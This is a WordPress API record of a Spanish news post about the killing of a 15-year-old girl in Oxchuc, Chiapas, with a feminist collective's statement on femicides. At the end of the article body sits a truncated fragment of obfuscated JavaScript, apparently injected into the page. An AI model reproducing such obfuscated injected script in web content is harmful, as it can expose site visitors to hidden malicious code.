{"id":19068,"date":"2024-11-29T03:35:10","date_gmt":"2024-11-29T03:35:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19068"},"modified":"2024-11-29T03:35:11","modified_gmt":"2024-11-29T03:35:11","slug":"exigen-justicia-por-asesinato-de-menor-de-15-anos-a-manos-de-su-esposo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19068","title":{"rendered":"Exigen justicia por asesinato de menor de 15 a\u00f1os a manos de su esposo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732851254344-576x1024.jpg\" alt=\"\" class=\"wp-image-19069\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732851254344-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732851254344-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732851254344-768x1365.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732851254344-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/FB_IMG_1732851254344.jpg 900w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>28 de noviembre del 2024<br>En las \u00faltimas horas, en la comunidad Paztontikja en el municipio de Oxchuc fue asesianda, Arely G\u00f3mez G\u00f3mez de 15 a\u00f1os de edad, presuntamente fue asesinada a golpes por su pareja.<\/p>\n\n\n\n<p>Ante ello, la Comisi\u00f3n a una Vida Libre de Violencia de las Mujeres de la Colectiva feminista 50 m\u00e1s 1 expresa su m\u00e1xima condena al crimen machista acontecido en esta comunidad.<\/p>\n\n\n\n<p>\u201cEs lamentable que la vida de cuatro mujeres y una menor de edad hayan sido arrebatadas a consecuencia de la violencia feminicida durante el mes de noviembre, y queremos trasladar al entorno de las victimas nuestro m\u00e1ximo respeto y solidaridad en esto duros momentos\u201d, expuso.<\/p>\n\n\n\n<p>Se\u00f1alan que, el caso de Arely de acuerdo a informaci\u00f3n de la Fiscal\u00eda, sucedi\u00f3 en la comunidad Paztontikja, donde la joven viv\u00eda con su pareja y sus suegros.<\/p>\n\n\n\n<p>Lo que se sabe del caso es que, la madrugada del pasado 26 de noviembre, la adolescente lleg\u00f3 a la casa familiar con diversos golpes en su anatom\u00eda, por lo que fue llevada al Hospital de Las Culturas en San Crist\u00f3bal de las Casas, donde falleci\u00f3 el d\u00eda 27.<\/p>\n\n\n\n<p>La familia de la joven refiere que anteriormente ya hab\u00edan denunciado la violencia que su hija ven\u00eda padeciendo en el concubinato.<\/p>\n\n\n\n<p>\u201cComenzamos el mes de noviembre con el feminicidio de Laura que fue asesinada a balazos por su pareja en Tuxtla Guti\u00e9rrez; le sigui\u00f3 Erika con siete meses de embarazo que fue encontrada en un domicilio en Palenque; a los pocos d\u00edas lamentamos el feminicidio de Anel que fue localizada sin vida en la carretera a Puerto Arista en el municipio de Tonal\u00e1. Despu\u00e9s nos estremecimos con el feminicidio de M\u00f3nica que dej\u00f3 hu\u00e9rfanos a dos menores. El responsable de esta tragedia huy\u00f3 y no ha sido detenido\u201d, se\u00f1ala la colectiva.<\/p>\n\n\n\n<p>As\u00ed en lo que va del a\u00f1o, la violencia machista ha dejado ya 34 v\u00edctimas, rebasando el a\u00f1o anterior, las cifras son escalofriantes y, sin embargo, solo reflejan la parte m\u00e1s visible y extrema de la violencia de g\u00e9nero.<\/p>\n\n\n\n<p>\u201cNecesitamos reforzar los mecanismos de detecci\u00f3n, atenci\u00f3n y protecci\u00f3n a mujeres v\u00edctimas de violencia de g\u00e9nero. As\u00ed como destinar m\u00e1s recursos y articular medios para llegar a tiempo y evitar m\u00e1s muertes\u201d, cita.<\/p>\n\n\n\n<p>Por \u00faltimo expuso que, en el \u00e1mbito de la prevenci\u00f3n es imprescindible instaurar obligatoriamente talleres de educaci\u00f3n y sensibilizaci\u00f3n en violencia de g\u00e9nero. Para ello necesitamos el compromiso de los centros educativos.<\/p>\n\n\n\n<p>Tenemos claro que sin el compromiso de las instituciones pol\u00edticas y los medios de comunicaci\u00f3n jam\u00e1s lograremos concienciar a la sociedad de que cada d\u00eda las mujeres estamos siendo asesinadas en alg\u00fan rinc\u00f3n de Chiapas por el mero hecho de ser mujeres.<\/p>\n\n\n\n<p>Como colectiva feminista convocamos a las autoridades competentes a revisar las estrategias, redise\u00f1ar acciones y programas, que coadyuven en general a que la justicia para las v\u00edctimas no sea s\u00f3lo una exigencia, sino una realidad enmarcada en la ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 28 de noviembre del 2024En las \u00faltimas horas, en la comunidad Paztontikja en el municipio de Oxchuc fue asesianda, Arely G\u00f3mez G\u00f3mez de 15 a\u00f1os de edad, presuntamente fue asesinada a golpes por su pareja. Ante ello, la Comisi\u00f3n a una Vida Libre de Violencia de las Mujeres de la Colectiva feminista 50 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19069,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-19068","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19068","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19068"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19068\/revisions"}],"predecessor-version":[{"id":19070,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19068\/revisions\/19070"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19069"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19068"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19068"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19068"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}